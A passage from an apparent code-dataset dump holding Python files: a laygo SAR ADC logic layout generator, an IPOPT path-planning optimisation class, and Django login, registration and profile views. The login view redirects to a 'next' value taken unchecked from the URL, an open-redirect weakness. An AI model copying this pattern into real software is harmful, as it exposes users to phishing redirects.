izp0 = laygen.relplace(name=\"I\" + objectname_pfix + 'OBUF0', templatename=inv_obuf_name,\n gridname=pg, refinstname=imux0.name, template_libname=templib_logic)\n imux1 = laygen.relplace(name=\"I\" + objectname_pfix + 'MUX1', templatename=mux2to1_name,\n gridname=pg, refinstname=izp0.name, template_libname=templib_logic)\n izm0 = laygen.relplace(name=\"I\" + objectname_pfix + 'OBUF1', templatename=inv_obuf_name,\n gridname=pg, refinstname=imux1.name, template_libname=templib_logic)\n imux2 = laygen.relplace(name=\"I\" + objectname_pfix + 'MUX2', templatename=mux2to1_name,\n gridname=pg, refinstname=izm0.name, template_libname=templib_logic)\n izmid0 = laygen.relplace(name=\"I\" + objectname_pfix + 'OBUF2', templatename=inv_obuf_name,\n gridname=pg, refinstname=imux2.name, template_libname=templib_logic)\n\n # internal pins\n isaopb0_i_xy = laygen.get_inst_pin_coord(isaopb0.name, 'I', rg_m3m4)\n isaopb0_o_xy = laygen.get_inst_pin_coord(isaopb0.name, 'O', rg_m3m4)\n isaomb0_i_xy = laygen.get_inst_pin_coord(isaomb0.name, 'I', rg_m3m4)\n isaomb0_o_xy = laygen.get_inst_pin_coord(isaomb0.name, 'O', rg_m3m4)\n ioai0_a_xy = laygen.get_inst_pin_coord(ioai0.name, 'A', rg_m3m4)\n ioai0_b_xy = laygen.get_inst_pin_coord(ioai0.name, 'B', rg_m3m4)\n ioai0_c_xy = laygen.get_inst_pin_coord(ioai0.name, 'C', rg_m3m4)\n ioai0_d_xy = laygen.get_inst_pin_coord(ioai0.name, 'D', rg_m3m4)\n ioai0_o_xy = laygen.get_inst_pin_coord(ioai0.name, 'O', rg_m3m4)\n ildpo0_i_xy = laygen.get_inst_pin_coord(ildpo0.name, 'I', rg_m3m4)\n ildpo0_o_xy = laygen.get_inst_pin_coord(ildpo0.name, 'O', rg_m3m4)\n ioai1_a_xy = laygen.get_inst_pin_coord(ioai1.name, 'A', rg_m3m4)\n ioai1_b_xy = laygen.get_inst_pin_coord(ioai1.name, 'B', rg_m3m4)\n ioai1_c_xy = laygen.get_inst_pin_coord(ioai1.name, 'C', rg_m3m4)\n ioai1_d_xy = laygen.get_inst_pin_coord(ioai1.name, 'D', rg_m3m4)\n ioai1_o_xy = laygen.get_inst_pin_coord(ioai1.name, 'O', rg_m3m4)\n ildno0_i_xy = laygen.get_inst_pin_coord(ildno0.name, 'I', rg_m3m4)\n ildno0_o_xy = laygen.get_inst_pin_coord(ildno0.name, 'O', rg_m3m4)\n ind0_a_xy = laygen.get_inst_pin_coord(ind0.name, 'A', rg_m3m4)\n ind0_b_xy = laygen.get_inst_pin_coord(ind0.name, 'B', rg_m3m4)\n ind0_o_xy = laygen.get_inst_pin_coord(ind0.name, 'O', rg_m3m4)\n imux0_i0_xy = laygen.get_inst_pin_coord(imux0.name, 'I0', rg_m3m4)\n imux0_i1_xy = laygen.get_inst_pin_coord(imux0.name, 'I1', rg_m3m4)\n imux0_en0_xy = laygen.get_inst_pin_coord(imux0.name, 'EN0', rg_m3m4)\n imux0_en1_xy = laygen.get_inst_pin_coord(imux0.name, 'EN1', rg_m3m4)\n imux0_o_xy = laygen.get_inst_pin_coord(imux0.name, 'O', rg_m3m4)\n imuxen0_i_xy = laygen.get_inst_pin_coord(imuxen0.name, 'I', rg_m3m4)\n imuxen0_o_xy = laygen.get_inst_pin_coord(imuxen0.name, 'O', rg_m3m4)\n imux1_i0_xy = laygen.get_inst_pin_coord(imux1.name, 'I0', rg_m3m4)\n imux1_i1_xy = laygen.get_inst_pin_coord(imux1.name, 'I1', rg_m3m4)\n imux1_en0_xy = laygen.get_inst_pin_coord(imux1.name, 'EN0', rg_m3m4)\n imux1_en1_xy = laygen.get_inst_pin_coord(imux1.name, 'EN1', rg_m3m4)\n imux1_o_xy = laygen.get_inst_pin_coord(imux1.name, 'O', rg_m3m4)\n imux2_i0_xy = laygen.get_inst_pin_coord(imux2.name, 'I0', rg_m3m4)\n imux2_i1_xy = laygen.get_inst_pin_coord(imux2.name, 'I1', rg_m3m4)\n imux2_en0_xy = laygen.get_inst_pin_coord(imux2.name, 'EN0', rg_m3m4)\n imux2_en1_xy = laygen.get_inst_pin_coord(imux2.name, 'EN1', rg_m3m4)\n imux2_o_xy = laygen.get_inst_pin_coord(imux2.name, 'O', rg_m3m4)\n izp0_i_xy = laygen.get_inst_pin_coord(izp0.name, 'I', rg_m3m4)\n izp0_o_xy = laygen.get_inst_pin_coord(izp0.name, 'O', rg_m3m4)\n izm0_i_xy = laygen.get_inst_pin_coord(izm0.name, 'I', rg_m3m4)\n izm0_o_xy = laygen.get_inst_pin_coord(izm0.name, 'O', rg_m3m4)\n izmid0_i_xy = laygen.get_inst_pin_coord(izmid0.name, 'I', rg_m3m4)\n izmid0_o_xy = laygen.get_inst_pin_coord(izmid0.name, 'O', rg_m3m4)\n\n #reference route coordinate\n y0 = isaopb0_i_xy[0][1]\n x0 = laygen.get_inst_xy(name=isaopb0.name, gridname=rg_m3m4)[0] + 1\n x1 = laygen.get_inst_xy(name=izmid0.name, gridname=rg_m3m4)[0]\\\n +laygen.get_template_size(name=izmid0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1\n #saopb/saomb\n rsaopbv0, rsaopb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], isaopb0_i_xy[0], np.array([x0, y0 + 3]), rg_m3m4)\n rsaombv0, rsaomb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], isaomb0_i_xy[0], np.array([x0, y0 + 4]), rg_m3m4)\n #vplus/vminus\n [rv0, rvplus0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], isaopb0_o_xy[0], ioai0_c_xy[0], y0 - 0, rg_m3m4)\n [rv0, rvminus0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], isaomb0_o_xy[0], ioai1_c_xy[0], y0 + 1, rg_m3m4)\n #rst/sb\n rrstv0, rrst0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai0_b_xy[0], np.array([x0, y0 - 2]), rg_m3m4)\n rv0, rsb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai0_d_xy[0], np.array([x0, y0 - 1+6]), rg_m3m4)\n rrstv1, rrst1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai1_b_xy[0], np.array([x0, y0 - 2]), rg_m3m4)\n [rv0, rsb1, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai1_d_xy[0], ioai0_d_xy[0], y0 - 1, rg_m3m4)\n #ldpo\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai0_o_xy[0], ildpo0_i_xy[0], y0 + 0 - 3, rg_m3m4, extendl=3, extendr=1)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildpo0_o_xy[0], ioai0_a_xy[0], y0 - 4, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildpo0_o_xy[0], imux0_i0_xy[0], y0 - 4, rg_m3m4)\n #ldno\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ioai1_o_xy[0], ildno0_i_xy[0], y0 + 0, rg_m3m4, extendl=2, extendr=2)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildno0_o_xy[0], ioai1_a_xy[0], y0 - 3, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildno0_o_xy[0], imux1_i0_xy[0], y0 - 3, rg_m3m4)\n #nand input\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildpo0_o_xy[0], ind0_b_xy[0], y0 - 4, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ildno0_o_xy[0], ind0_a_xy[0], y0 - 3, rg_m3m4)\n #nand output(ldndo)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ind0_o_xy[0], imux2_i0_xy[0], y0 - 1, rg_m3m4)\n #mux en\n rextselv0, rextsel0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_i_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux0_en1_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux1_en1_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux2_en1_xy[0], np.array([x0, y0 + 2]), rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_o_xy[0], imux0_en0_xy[0], y0 + 1, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_o_xy[0], imux1_en0_xy[0], y0 + 1, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imuxen0_o_xy[0], imux2_en0_xy[0], y0 + 1, rg_m3m4)\n #mux ext\n rv0, rext_zpb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux0_i1_xy[0], np.array([imux0_i1_xy[0][0]-4, y0 + 0]), rg_m3m4)\n rv0, rext_zmb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux1_i1_xy[0], np.array([imux1_i1_xy[0][0]-4, y0 + 0]), rg_m3m4)\n rv0, rext_zmidb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], imux2_i1_xy[0], np.array([imux2_i1_xy[0][0]-4, y0 + 0]), rg_m3m4)\n #mux output\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imux0_o_xy[0], izp0_i_xy[0], y0 + 0, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imux1_o_xy[0], izm0_i_xy[0], y0 + 0, rg_m3m4)\n [rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], imux2_o_xy[0], izmid0_i_xy[0], y0 + 0, rg_m3m4)\n #final output\n rv0, rzp0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], izp0_o_xy[0], np.array([x1, y0 - 4]), rg_m3m4)\n rv0, rzm0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], izm0_o_xy[0], np.array([x1, y0 - 3]), rg_m3m4)\n rv0, rzmid0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], izmid0_o_xy[0], np.array([x1, y0 - 1]), rg_m3m4)\n \n #pins \n laygen.create_boundary_pin_form_rect(rsaopb0, rg_m3m4, \"SAOPB\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.pin_from_rect('SAOPB2', laygen.layers['pin'][3], rsaopbv0, gridname=rg_m3m4, netname='SAOPB')\n laygen.create_boundary_pin_form_rect(rsaomb0, rg_m3m4, \"SAOMB\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.pin_from_rect('SAOMB2', laygen.layers['pin'][3], rsaombv0, gridname=rg_m3m4, netname='SAOMB')\n laygen.create_boundary_pin_form_rect(rsb0, rg_m3m4, \"SB\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.create_boundary_pin_form_rect(rrst0, rg_m3m4, \"RST\", laygen.layers['pin'][4], size=6, direction='left')\n #laygen.pin_from_rect('RST2', laygen.layers['pin'][3], rrstv0, gridname=rg_m3m4, netname='RST')\n laygen.pin_from_rect('RST2', laygen.layers['pin'][3], rrstv1, gridname=rg_m3m4, netname='RST')\n laygen.create_boundary_pin_form_rect(rextsel0, rg_m3m4, \"EXTSEL\", laygen.layers['pin'][4], size=6, direction='left')\n laygen.pin_from_rect('EXTSEL2', laygen.layers['pin'][3], rextselv0, gridname=rg_m3m4, netname='EXTSEL')\n laygen.create_boundary_pin_form_rect(rext_zpb0, rg_m3m4, \"EXT_ZPB\", laygen.layers['pin'][4], size=4, direction='left')\n laygen.create_boundary_pin_form_rect(rext_zmb0, rg_m3m4, \"EXT_ZMB\", laygen.layers['pin'][4], size=4, direction='left')\n laygen.create_boundary_pin_form_rect(rext_zmidb0, rg_m3m4, \"EXT_ZMIDB\", laygen.layers['pin'][4], size=4, direction='left')\n laygen.create_boundary_pin_form_rect(rzp0, rg_m3m4, \"ZP\", laygen.layers['pin'][4], size=6, direction='right')\n laygen.create_boundary_pin_form_rect(rzm0, rg_m3m4, \"ZM\", laygen.layers['pin'][4], size=6, direction='right')\n laygen.create_boundary_pin_form_rect(rzmid0, rg_m3m4, \"ZMID\", laygen.layers['pin'][4], size=6, direction='right')\n\n # power pin\n create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isaopb0, inst_right=izmid0)\n\nif __name__ == '__main__':\n laygen = laygo.GridLayoutGenerator(config_file=\"laygo_config.yaml\")\n\n import imp\n try:\n imp.find_module('bag')\n laygen.use_phantom = False\n except ImportError:\n laygen.use_phantom = True\n\n tech=laygen.tech\n utemplib = tech+'_microtemplates_dense'\n logictemplib = tech+'_logic_templates'\n laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib)\n laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib)\n laygen.load_template(filename=logictemplib+'.yaml', libname=logictemplib)\n laygen.templates.sel_library(utemplib)\n laygen.grids.sel_library(utemplib)\n\n # library load or generation\n workinglib = 'adc_sar_generated'\n laygen.add_library(workinglib)\n laygen.sel_library(workinglib)\n if os.path.exists(workinglib + '.yaml'): # generated layout file exists\n laygen.load_template(filename=workinglib + '.yaml', libname=workinglib)\n laygen.templates.sel_library(utemplib)\n\n #grid\n pg = 'placement_basic' #placement grid\n rg_m1m2 = 'route_M1_M2_cmos'\n rg_m1m2_thick = 'route_M1_M2_thick'\n rg_m2m3 = 'route_M2_M3_cmos'\n rg_m2m3_thick = 'route_M2_M3_thick'\n rg_m3m4 = 'route_M3_M4_basic'\n rg_m4m5 = 'route_M4_M5_basic'\n rg_m5m6 = 'route_M5_M6_basic'\n rg_m1m2_pin = 'route_M1_M2_basic'\n rg_m2m3_pin = 'route_M2_M3_basic'\n\n #display\n #laygen.display()\n #laygen.templates.display()\n #laygen.save_template(filename=workinglib+'_templates.yaml', libname=workinglib)\n\n mycell_list = []\n #sarlogic generation\n m=1\n cellname='sarlogic'\n print(cellname+\" generating\")\n mycell_list.append(cellname)\n laygen.add_cell(cellname)\n laygen.sel_cell(cellname)\n generate_sarlogic(laygen, objectname_pfix='SL0', templib_logic=logictemplib,\n placement_grid=pg, routing_grid_m3m4=rg_m3m4, m=m, origin=np.array([0, 0]))\n laygen.add_template_from_cell()\n\n\n laygen.save_template(filename=workinglib+'.yaml', libname=workinglib)\n #bag export, if bag does not exist, gds export\n import imp\n try:\n imp.find_module('bag')\n import bag\n prj = bag.BagProject()\n for mycell in mycell_list:\n laygen.sel_cell(mycell)\n laygen.export_BAG(prj, array_delimiter=['[', ']'])\n except ImportError:\n laygen.export_GDS('output.gds', cellname=mycell_list, layermapfile=tech+\".layermap\") # change layermapfile\n","sub_path":"generators/adc_sar_sarlogic_layout_generator_bak160128.py","file_name":"adc_sar_sarlogic_layout_generator_bak160128.py","file_ext":"py","file_size_in_byte":18414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642291006","text":"import ipopt\nimport probInfo as prob\nfrom problemData import *\nimport globalVars\n\nclass nlpProb(object):\n\n def __init__(self, N, T, t0, x0, x00_23, ncons, nu, path, obstacle, posIdx,\n ns_option, V_cmd, lb_VTerm, lb_VdotVal, delChi_max, obstacleID, fHandleCost = None):\n try:\n self.N = N\n self.T = T\n self.t0 = t0\n self.x0 = x0\n self.ncons = ncons # number of constraints\n self.ncons_vary = np.copy(ncons)\n self.nu = nu # number of controls\n self.path = path\n self.obstacle = obstacle\n self.posIdx = posIdx\n self.ns_option = ns_option\n self.V_cmd = V_cmd\n self.lb_VTerm = lb_VTerm\n self.lb_VdotVal = lb_VdotVal\n self.fHandleCost = fHandleCost\n self.addObstacleConstraints = False\n self.obstacleNumber = np.array([], dtype=int)\n self.delChi_max = delChi_max\n self.obstacleID = obstacleID\n self.x00_23 = x00_23\n\n useOnlyObstaclesInView = True\n\n if useOnlyObstaclesInView:\n nObstacle = len(obstacle.N)\n if nObstacle > 0:\n for j in range(nObstacle):\n \n p1 = x0[0:2]\n p2 = np.array([obstacle.E[j], obstacle.N[j]])\n distToObstacle = distance(p1, p2)\n \n #print('{0:.1f}, {1:.1f}'.format(distToObstacle, safeDistance))\n \n if distToObstacle < safeDistance:\n self.addObstacleConstraints = True\n self.obstacleNumber = np.concatenate([self.obstacleNumber, np.array([j])])\n self.ncons_vary += N\n\n else:\n nObstacle = len(obstacleID)\n if nObstacle > 0:\n for j in range(nObstacle):\n \n id = obstacleID[j]\n p1 = x0[0:2]\n p2 = np.array([obstacle.E[id], obstacle.N[id]])\n distToObstacle = distance(p1, p2)\n \n # print('{0:.1f}, {1:.1f}'.format(distToObstacle, safeDistance))\n \n if distToObstacle < safeDistance:\n self.addObstacleConstraints = True\n self.obstacleNumber = np.concatenate([self.obstacleNumber, np.array([id]) ])\n self.ncons_vary += N\n\n pass\n except:\n print('Error in init')\n\n def objective(self, u):\n N = self.N\n T = self.T\n t0 = self.t0\n x0 = self.x0\n path = self.path\n obstacle = self.obstacle\n posIdx = self.posIdx\n V_cmd = self.V_cmd\n fHandleCost = self.fHandleCost\n x00_23 = self.x00_23\n\n x = prob.computeOpenloopSolution(u, N, T, t0, x0, x00_23)\n costvec = np.zeros([3*N+2, 1])\n\n for k in range(N):\n uk = np.array([u[k],u[k+N]])\n costout = prob.runningCosts(uk, x[k], t0 + k*T, path, obstacle, posIdx, V_cmd)\n costvec[k] = costout[0] # V\n costvec[k+N] = costout[1] # Vdot or Vddot\n costvec[k+2*N] = costout[2] # Chidot or Chiddot\n\n cost_goalDist, cost_goalDelChi = prob.goalCost(x0, t0)\n #cost_goalDist, cost_goalDelChi = prob.goalCost(x[-1,:], t0)\n costvec[3*N] = cost_goalDist # goal dist\n costvec[3*N+1] = cost_goalDelChi # goal delta chi\n\n cost = np.sum(costvec)\n\n\n # write data once for analysis later using a global variable. other mentioned can be developed to not use the\n # global variable - but this was the least intrusive way of adding the functionality\n if globalVars.writeToFileCost == True:\n for k in range(3*N):\n fHandleCost.write('%.2f ' %(costvec[k]) )\n fHandleCost.write('%.2f ' % (costvec[3*N]))\n fHandleCost.write('%.2f ' % (costvec[3*N+1]))\n fHandleCost.write('\\n')\n globalVars.writeToFileCost = False\n\n return cost\n\n\n def gradient(self, u):\n N = self.N\n nu = self.nu\n\n eps = 1e-2\n obj_grad_u = np.zeros(nu*N)\n for k in range(nu*N):\n uplus = np.copy(u)\n uminus = np.copy(u)\n\n uplus[k] = uplus[k] + eps\n obj_uplus = self.objective(uplus)\n\n uminus[k] = uminus[k] - eps\n obj_uminus = self.objective(uminus)\n\n obj_grad_u[k] = (obj_uplus - obj_uminus) / (2 * eps)\n\n return obj_grad_u\n\n\n def constraints(self, u):\n try:\n N = self.N\n T = self.T\n t0 = self.t0\n x0 = self.x0\n path = self.path\n obstacle = self.obstacle\n posIdx = self.posIdx\n ns_option = self.ns_option\n x00_23 = self.x00_23\n\n x = prob.computeOpenloopSolution(u, N, T, t0, x0, x00_23)\n\n consR1 = np.array([], dtype=float)\n\n if ns == 6:\n\n if ns_option == 1: # Additional Current velocity + Terminal velocity constraint\n\n consR2 = np.array([x[0, idx_V] * x[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n consR3 = np.array([x[0, idx_V]]) # current velocity\n\n constmp = np.concatenate([consR1, consR2])\n consR = np.concatenate([constmp, consR3])\n\n # terminal constraint (dy, V, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = np.concatenate([consT2, consT3])\n\n elif ns_option == 2:\n\n # No terminal velocity constraint\n consR2 = np.array([x[0, idx_V] * x[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, dV, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = np.concatenate([consT2, consT3])\n\n elif ns_option == 3:\n\n # No terminal velocity constraint\n consR2 = np.array([x[0, idx_V] * x[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, V, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = consT3\n\n elif ns == 4:\n\n if ns_option == 1:\n\n u_mat = u.reshape(2, -1).T\n consR2 = np.array([x[0, idx_V] * u_mat[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n consR3 = np.array([x[0, idx_V]]) # current velocity\n\n constmp = np.concatenate([consR1, consR2])\n consR = np.concatenate([constmp, consR3])\n\n # terminal constraint (dy, dV, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N - 1], t0, path, obstacle, posIdx)\n consT = np.concatenate([consT2, consT3])\n\n elif ns_option == 2:\n\n u_mat = u.reshape(2, -1).T\n consR2 = np.array([x[0, idx_V] * u_mat[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, V, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N-1], t0, path, obstacle, posIdx) # ydist, VEnd\n consT = np.concatenate([consT2, consT3])\n\n\n elif ns_option == 3:\n\n u_mat = u.reshape(2,-1).T\n consR2 = np.array([x[0, idx_V] * u_mat[0, idx_Chidot] * useLatAccelCons]) # lateral acceleration\n\n consR = np.concatenate([consR1, consR2])\n\n # terminal constraint (dy, dV, delChi)\n consT1, consT2, consT3 = prob.terminalCons(u, x[N-1], t0, path, obstacle, posIdx) # ydist, VEnd\n consT = consT3\n\n # total constraints without obstacles\n cons = np.concatenate([consR,consT])\n\n # total constraints with obstacles\n if self.addObstacleConstraints == True:\n\n for j in self.obstacleNumber:\n for k in range(N):\n position = x[k][0:2]\n obstacleDistance = np.sqrt([(obstacle.E[j] - position[0]) ** 2 +\n (obstacle.N[j] - position[1]) ** 2])\n cons = np.concatenate([cons, obstacleDistance])\n\n return cons\n except:\n print('Error in constraints')\n\n def jacobian(self, u):\n try:\n N = self.N\n ncons_vary = self.ncons_vary\n nu = self.nu\n jac = np.zeros([ncons_vary,nu*N])\n eps = 1e-2\n\n for j in range(ncons_vary):\n\n for k in range(nu*N):\n uplus = np.copy(u)\n uminus = np.copy(u)\n\n uplus[k] = uplus[k] + eps\n cons_uplus = self.constraints(uplus)\n\n uminus[k] = uminus[k] - eps\n cons_uminus = self.constraints(uminus)\n\n jac[j,k] = (cons_uplus[j] - cons_uminus[j]) / (2 * eps)\n\n return jac.flatten()\n except:\n print('Error in jacobian')\n\n\n def setup(self, u0):\n try:\n N = self.N\n T = self.T\n t0 = self.t0\n x0 = self.x0\n nu = self.nu\n path = self.path\n obstacle = self.obstacle\n posIdx = self.posIdx\n ns_option = self.ns_option\n V_cmd = self.V_cmd\n lb_VTerm = self.lb_VTerm\n lb_VdotVal = self.lb_VdotVal\n fHandleCost = self.fHandleCost\n delChi_max = self.delChi_max\n obstacleID = self.obstacleID\n x00_23 = self.x00_23\n\n LARGE_NO = 1e12\n\n if ns == 6:\n\n lb_Vddot = np.ones([N,1])*lb_VddotVal\n lb_Chiddot = np.ones([N,1])*lb_ChiddotVal\n\n ub_Vddot = np.ones([N,1])*ub_VddotVal\n ub_Chiddot = np.ones([N,1])*ub_ChiddotVal\n\n lb = np.concatenate([lb_Vddot, lb_Chiddot])\n ub = np.concatenate([ub_Vddot,ub_Chiddot])\n\n elif ns == 4:\n\n lb_Vdot = np.ones([N, 1]) * lb_VdotVal\n lb_Chidot = np.ones([N, 1]) * lb_ChidotVal\n\n ub_Vdot = np.ones([N, 1]) * ub_VdotVal\n ub_Chidot = np.ones([N, 1]) * ub_ChidotVal\n\n lb = np.concatenate([lb_Vdot, lb_Chidot])\n ub = np.concatenate([ub_Vdot, ub_Chidot])\n\n\n lataccel_max = lataccel_maxVal\n\n cl_running = np.array([], dtype=float)\n cu_running = np.array([], dtype=float)\n\n cl_tmp1 = np.concatenate([cl_running, [-lataccel_max]])\n cu_tmp1 = np.concatenate([cu_running, [+lataccel_max]])\n\n #u_approx = u0.flatten(1)\n #x = prob.computeOpenloopSolution(u_approx, N, T, t0, x0)\n\n if ns_option == 1:\n\n # Speed Constraint\n cl_tmp2 = np.concatenate([cl_tmp1, [lb_V]])\n cu_tmp2 = np.concatenate([cu_tmp1, [ub_V]])\n\n # Terminal Constraint - V\n tmp = 0\n cl_tmp3 = np.concatenate([cl_tmp2, [tmp]]) # need to modify\n cu_tmp3 = np.concatenate([cu_tmp2, [tmp]])\n\n # Terminal Constraint - delChi\n cl = np.concatenate([cl_tmp3, [-delChi_max]])\n cu = np.concatenate([cu_tmp3, [+delChi_max]])\n\n\n elif ns_option == 2:\n\n cl_tmp2 = cl_tmp1\n cu_tmp2 = cu_tmp1\n\n cl_tmp3 = np.concatenate([cl_tmp2, [lb_VTerm]])\n cu_tmp3 = np.concatenate([cu_tmp2, [ub_VTerm]])\n\n # Terminal Constraint - delChi\n cl = np.concatenate([cl_tmp3, [-delChi_max]])\n cu = np.concatenate([cu_tmp3, [+delChi_max]])\n\n elif ns_option == 3:\n\n cl = np.concatenate([cl_tmp1, [-delChi_max]])\n cu = np.concatenate([cu_tmp1, [+delChi_max]])\n\n # total constraints with obstacles\n\n if self.addObstacleConstraints == True:\n\n #print(self.obstacleNumber)\n for j in self.obstacleNumber:\n for k in range(N):\n cl = np.concatenate([cl, [obstacle.sr[j]]])\n cu = np.concatenate([cu, [LARGE_NO]])\n\n nlp = ipopt.problem(\n n=nu*N,\n m=len(cl),\n problem_obj=nlpProb(N, T, t0, x0, x00_23, ncons, nu, path,\n obstacle, posIdx, ns_option, V_cmd,\n lb_VTerm, lb_VdotVal, delChi_max, obstacleID, fHandleCost),\n lb=lb,\n ub=ub,\n cl=cl,\n cu=cu\n )\n #print(len(cl))\n nlp.addOption('print_level', nlpPrintLevel)\n nlp.addOption('max_iter', nlpMaxIter)\n #nlp.addOption('dual_inf_tol',10.0) # defaut = 1\n nlp.addOption('constr_viol_tol',1e-4) # default = 1e-4\n nlp.addOption('compl_inf_tol',1e-4) # default = 1e-4\n nlp.addOption('acceptable_tol',1e-6) # default = 1e-6\n nlp.addOption('acceptable_constr_viol_tol',0.01) # default = 0.01\n\n return nlp\n except:\n print('Error in setup')","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":13932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"185026037","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login\nfrom .forms import LoginForm, UserRegistrationForm\nfrom .models import Profile\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\ndef user_login(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(username=cd['username'],\n password=cd['password'])\n\n if user is not None:\n if user.is_active:\n login(request, user)\n try:\n redirect_url = request.get_full_path().split('?next=')[1]\n except:\n redirect_url=\"/\"\n # print(request.build_absolute_uri(redirect_url))\n return redirect(redirect_url)\n # return HttpResponse('Authenticated successfully')\n else:\n return HttpResponse('Disabled account')\n else:\n return HttpResponse('Invalid login')\n else:\n form = LoginForm()\n return render(request, 'account/login.html', {'form': form})\n\n\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # Create a new user object but avoid saving it yet\n new_user = user_form.save(commit=False)\n # Set the chosen password\n new_user.set_password(user_form.cleaned_data['password'])\n # Save the User object\n new_user.save()\n # Create the user profile\n profile = Profile.objects.create(user=new_user)\n return render(request,\n 'account/register_done.html',\n {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n return render(request,\n 'account/register.html',\n {'user_form': user_form})\n\n\n\n\nfrom .forms import UserEditForm, ProfileEditForm\n\n@login_required(login_url=\"/account/login/\")\ndef edit(request):\n if request.method == 'POST':\n user_form = UserEditForm(data=request.POST)\n profile_form = ProfileEditForm(data=request.POST,\n files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, 'Profile updated successfully')\n else:\n messages.error(request, 'Profile updated Error')\n else:\n user_form = UserEditForm()\n profile_form = ProfileEditForm()\n return render(request,\n 'account/edit.html',\n {'user_form': user_form,\n 'profile_form': profile_form})\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140354800","text":"\"\"\"\nThe Voyager 1 spacecraft, launched 